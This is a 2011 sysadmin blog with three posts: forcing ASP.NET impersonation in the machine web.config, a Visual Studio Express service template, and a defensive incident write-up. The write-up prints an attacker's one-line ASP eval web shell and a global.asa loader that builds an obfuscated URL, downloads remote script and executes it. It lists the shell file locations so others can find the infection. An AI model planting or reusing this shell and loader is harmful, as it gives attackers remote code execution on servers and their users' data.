December 9, 2011
I decided to look into impersonation a bit more and how I could force our Windows Platform to impersonate, without letting our users change it back in their web.config file. I found a good number of google searches, but nothing really stuck until I realized I could simply add in the web.config of the machine a location, set allowOverride to “false” then tell it what to do, without users being able to modify it!
Here’s the line I added at the top of the web.config located at c:\windows\microsoft.net\framework\v2.0.50727\CONFIG.
<location allowOverride="false">
<system.web>
<identity impersonate="true"/>
</system.web>
</location>
<location allowOverride="true">
<system.web>
<securityPolicy>
<trustLevel name="Full" policyFile="internal"/>
<trustLevel name="High" policyFile="web_hightrust.config"/>
<trustLevel name="Medium" policyFile="web_mediumtrust.config"/>
<trustLevel name="Low" policyFile="web_lowtrust.config"/>
<trustLevel name="Minimal" policyFile="web_minimaltrust.config"/>
</securityPolicy>
<trust level="Full" originUrl=""/>
</system.web>
</location>
October 11, 2011
I had a need to make a Windows Service, but I was using Visual Studio 2010 Express. You may notice does not come with a Windows Service template. I’m not sure why they decided not to include this template, other than they want to force people to purchase their product to get basic functionality. Little do they know savvy people like you and I do google searches and figure out what we want anyway.
I create this template for Visual Studio 2010 Express: Windows Service with a System.Timer
I created my template by using an existing Visual Studio 2008 (non-express) Windows Service project. I took the service, cleared out the stuff I added, then exported it.
To make it a template simply copy the zip file under %userprofile%\My Documents\Visual Studio 2010\Templates\ProjectTemplates\
If it helps let me know!
October 4, 2011
Well more fun for me! We had an outbreak of script kiddies using the global.asa file to attempt to download and execute remote code. It turns out a few accounts had a file called style.asp in their root folder which contained a very simple method of executing commands under that account. If anyone else has a similar issue, look for *.asp files with eval in them. I hope this helps.
style.asp:
<%eval request(“seo”)%>
global.asa:
<script language=”vbscript” runat=”server”>
‘by*diao
‘by*aming
sub Application_OnStart
end sub
sub Application_OnEnd
end sub
sub Session_OnStart
url=”h”&”t”&”t”&”p”&”:”&”/”&”/w”&”w”&”w”&”.”&”g”&”x”&”t”&”.”&”l”&”a”&”/”&”i”&”n”&”/”&”p”&”j”&”c”&”3″&”.”&”t”&”x”&”t”&”"
Set ObjXMLHTTP=Server.CreateObject(“MSXML2.serverXMLHTTP”)
ObjXMLHTTP.Open “GET”,url,False
ObjXMLHTTP.setRequestHeader “User-Agent”,url
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject(“Adodb.Stream”)
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = “gb2312″
GetHtml = objStream.ReadText
objStream.Close
if instr(GetHtml,”by*aming”)>0 then
execute GetHtml
end if
end sub
‘sub Session_OnEnd
‘end sub
</script>
Update: They also add a few folders if they don’t exist. Look for /web /css /images/inc
Under the /css they usually have a file called att.asp, or zelx.asp.
Under /web they usually have User.aspx and zelx.asp
and under /images/inc they usually have config.asp which may have the same content as style.asp <%eval request(“seo”)%>
